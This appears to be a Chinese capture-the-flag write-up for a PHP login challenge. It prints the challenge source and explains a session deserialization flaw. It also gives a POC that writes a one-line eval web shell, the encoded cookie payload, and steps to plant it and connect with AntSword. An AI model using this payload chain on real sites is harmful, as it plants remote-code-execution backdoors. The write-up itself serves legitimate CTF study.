我们使用dirsearch扫描,可以扫描到www.zip源码
下载源码
index.php
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-03 16:28:37
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-06 19:21:45
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
session_start();
//超过5次禁止登陆
if(isset($_SESSION['limit'])){
$_SESSION['limti']>5?die("登陆失败次数超过限制"):$_SESSION['limit']=base64_decode($_COOKIE['limit']);
$_COOKIE['limit'] = base64_encode(base64_decode($_COOKIE['limit']) +1);
}else{
setcookie("limit",base64_encode('1'));
$_SESSION['limit']= 1;
}
?>
check.php
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-03 16:59:10
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-06 19:15:38
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
require_once 'inc/inc.php';
$GET = array("u"=>$_GET['u'],"pass"=>$_GET['pass']);
if($GET){
$data= $db->get('admin',
[ 'id',
'UserName0'
],[
"AND"=>[
"UserName0[=]"=>$GET['u'],
"PassWord1[=]"=>$GET['pass'] //密码必须为128位大小写字母+数字+特殊符号,防止爆破
]
]);
if($data['id']){
//登陆成功取消次数累计
$_SESSION['limit']= 0;
echo json_encode(array("success","msg"=>"欢迎您".$data['UserName0']));
}else{
//登陆失败累计次数加1
$_COOKIE['limit'] = base64_encode(base64_decode($_COOKIE['limit'])+1);
echo json_encode(array("error","msg"=>"登陆失败"));
}
}
这道题撞坑撞晕了
这题利用的是session反序列化漏洞PHP session反序列化漏洞原理解析
理解了session反序列化漏洞的原来后我们来构造POC
<?php
class User{
public $username;
public $password;
public $status;
}
$a = new User();
$a -> username = "1.php";
$a -> password = '<?=eval($_POST[passwd]);?>';
echo urlencode(base64_encode("|".serialize($a)));
接下来就全是坑了
首先不要用hackbar传cookie,因为他会影响其他的cookie(这题会影响phpssid,除非你能手动传phpssid)
然后这题不是在你点登陆的时候传cookie,是在访问index.php的时候传cookie
最后要多刷新几次,因为你刚执行过某些东西,后端的session可能还没来得及恢复原样就又被操控了,然后就导致一些玄学问题
(反正我快要被急哭了)
说了这么多,那就说下过程吧
首先是访问主页(带不带index.php路径都可以)
接着刷新一下子,用burpsuite抓包,改cookie,将limit 改成
limit=fE86NDoiVXNlciI6Mzp7czo4OiJ1c2VybmFtZSI7czo1OiIxLnBocCI7czo4OiJwYXNzd29yZCI7czoyNjoiPD89ZXZhbCgkX1BPU1RbcGFzc3dkXSk7Pz4iO3M6Njoic3RhdHVzIjtOO30%3D
刷新好后(记住只刷新这一次)可以点击登录,也可以去访问一下check.php,执行一次(session_start()),最后就去访问 log-1.php
如过能出现一些内容,就成功了,然后antsowrd连接就行了,如果没有成功,一定要多刷新几遍再传cookie